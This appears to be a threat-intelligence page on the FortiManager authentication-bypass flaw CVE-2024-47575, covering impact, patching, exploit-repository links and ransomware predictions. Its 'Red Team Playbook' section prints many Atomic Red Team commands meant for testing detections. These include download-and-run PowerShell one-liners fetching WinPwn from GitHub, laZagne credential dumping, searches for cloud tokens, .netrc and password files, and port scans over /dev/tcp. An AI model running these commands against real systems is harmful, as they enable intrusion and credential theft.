CVE-2024-47575
Overview
This vulnerability is an authentication bypass affecting Fortinet FortiManager and FortiManager Cloud versions from 6.2.0 to 7.6.0. The root cause is a missing authentication check on critical functions within the management interface, allowing unauthorized access. The flaw resides in the access control mechanism of the FortiManager's administrative API endpoints, which fail to validate user credentials before processing requests.
Vulnerability Description
A missing authentication for critical function in FortiManager 7.6.0, FortiManager 7.4.0 through 7.4.4, FortiManager 7.2.0 through 7.2.7, FortiManager 7.0.0 through 7.0.12, FortiManager 6.4.0 through 6.4.14, FortiManager 6.2.0 through 6.2.12, Fortinet FortiManager Cloud 7.4.1 through 7.4.4, FortiManager Cloud 7.2.1 through 7.2.7, FortiManager Cloud 7.0.1 through 7.0.12, FortiManager Cloud 6.4.1 through 6.4.7 allows attacker to execute arbitrary code or commands via specially crafted requests.
Impact
An unauthenticated attacker can execute arbitrary code or commands on affected FortiManager and FortiManager Cloud systems. This allows full control over the device management infrastructure, potentially leading to data compromise, disruption of network management operations, and lateral movement within the enterprise environment. No authentication or user interaction is needed, making exploitation straightforward and increasing the likelihood of compromise in exposed deployments.
Solution
Fortinet has released security updates addressing this issue in FortiManager and FortiManager Cloud versions beyond 7.6.0 and corresponding 7.4.x, 7.2.x, 7.0.x, 6.4.x, and 6.2.x branches. Administrators should apply the patches as detailed in the Fortinet advisory FG-IR-24-423 available at https://fortiguard.fortinet.com/psirt/FG-IR-24-423. The advisory provides version-specific upgrade instructions and recommended mitigation steps to restore proper authentication enforcement on management API endpoints.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability present in FortiManager versions 7.6.0 and earlier, including various iterations of the FortiManager Cloud, stems from a critical flaw related to missing authentication for essential functions. This oversight allows unauthorized users to send specially crafted requests that can lead to the execution of arbitrary code or commands on the affected systems. The lack of proper authentication mechanisms means that an attacker can potentially bypass security controls, gaining access to sensitive functionalities that should be restricted to authenticated users only. This vulnerability highlights a significant lapse in the security design of the FortiManager platform, which is widely used for centralized management of Fortinet security devices.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. Given that the flaw allows for arbitrary code execution, an attacker could leverage this weakness to perform a variety of malicious actions, such as deploying malware, altering configurations, or exfiltrating sensitive data. Scenarios may include an external attacker targeting an exposed FortiManager instance over the internet or an insider threat exploiting internal access. The ability to execute arbitrary commands could also lead to lateral movement within a network, allowing attackers to pivot to other systems and escalate their privileges, thereby increasing their foothold within the organization.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely heavily on FortiManager for their security posture. The potential for unauthorized access to critical management functions could lead to significant business risks, including data breaches, service disruptions, and financial losses. Organizations may face regulatory penalties if sensitive data is compromised, and the reputational damage from such incidents can be long-lasting. Furthermore, the high CVSS score of 9.8 indicates that this vulnerability poses an urgent threat, necessitating immediate attention from security teams to mitigate the risks involved.
To effectively detect and mitigate this vulnerability, organizations should adopt a multi-layered approach to security. Regular vulnerability assessments and penetration testing can help identify exposed instances of FortiManager that may be susceptible to exploitation. Implementing strict access controls, including network segmentation and the principle of least privilege, can reduce the attack surface and limit the potential for unauthorized access. Additionally, organizations should ensure that they are running the latest versions of FortiManager and apply any available patches or updates provided by Fortinet. Monitoring logs for unusual activity and employing intrusion detection systems can also aid in the early detection of exploitation attempts.
In conclusion, the missing authentication vulnerability in FortiManager represents a critical security risk that organizations must address promptly. By understanding the technical details, potential attack vectors, and real-world implications, security professionals can better prepare their defenses against such threats. Proactive measures, including regular updates, access control enforcement, and continuous monitoring, are essential to safeguarding against exploitation and ensuring the integrity of the systems that manage vital security infrastructure.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-47575, reflected by a doubling in observed activity and a corresponding increase in the EPSS score. This uptick signals growing adversary interest and operational momentum in leveraging the unauthenticated remote code execution vulnerability in FortiManager and FortiManager Cloud platforms. The proliferation of publicly available proof-of-concept exploits, including multiple GitHub repositories and a Metasploit module, has likely lowered the barrier to entry for threat actors, facilitating broader and more opportunistic exploitation attempts. While no direct ransomware campaigns have yet been confidently linked to this vulnerability, the presence of known ransomware groups such as Akira and Ransomhub in the broader threat landscape underscores the potential for future weaponization. For defenders, this evolving threat landscape demands heightened vigilance as exploitation activity intensifies and the risk of compromise escalates. Consequently, the overall threat level associated with CVE-2024-47575 should be considered elevated, reflecting both the increased exploitation frequency and the expanding toolkit available to attackers.
Update 2 — July 09, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-47575, reflected by a noticeable uptick in telemetry signals. This increase coincides with the continued availability of multiple new proof-of-concept exploits and a fully integrated Metasploit module, collectively lowering the technical barrier for adversaries to execute unauthenticated remote code execution against vulnerable FortiManager and FortiManager Cloud deployments. While ransomware groups have not yet been definitively linked to active campaigns leveraging this vulnerability, the persistent presence of known threat actors such as Akira and Ransomhub within the broader ecosystem sustains the potential for imminent weaponization. For defenders, this evolving dynamic signifies an elevated risk environment where opportunistic exploitation could rapidly translate into operational compromise. Consequently, the threat level associated with CVE-2024-47575 should be considered heightened, reflecting both the intensifying exploitation activity and the expanding arsenal of publicly accessible attack tools.
Affected Products (10)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortinet | Fortimanager | All |
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortimanager | All |
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortimanager | All |
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortimanager | All |
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortimanager | All |
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortimanager | 7.6.0 |
cpe:2.3:a:fortinet:fortimanager:7.6.0:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortimanager Cloud | All |
cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortimanager Cloud | All |
cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortimanager Cloud | All |
cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortimanager Cloud | All |
cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Fortinet FortiManager Unauthenticated RCE
exploits/linux/misc/fortimanager_rce_cve_2024_47575
|
sfewer-r7 | Unknown | - | View |
GitHub PoCs (4)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
watchtowrlabs/Fortijump-Exploit-CVE-2024-47575
Fortinet Fortimanager Unauthenticated Remote Code Execution AKA FortiJump CVE-2024-47575
|
watchtowrlabs | 97 | 30 | 2024-11-07 | View |
|
SkyGodling/exploit-cve-2024-47575
FortiManager Unauthenticated Remote Code Execution (CVE-2024-47575)
|
SkyGodling | 1 | 0 | 2024-11-15 | View |
|
revanslbw/CVE-2024-47575-POC
CVE POC Exploit
|
revanslbw | 0 | 0 | 2025-01-05 | View |
|
AnnnNix/CVE-2024-47575
PoC for CVE-2024-47575
|
AnnnNix | 0 | 0 | 2025-07-19 | View |
Threat Feed
10 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-47575 |
| fortiguard.fortinet.com |
GitHub CVE
|
https://fortiguard.fortinet.com/psirt/FG-IR-24-423 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-47575 |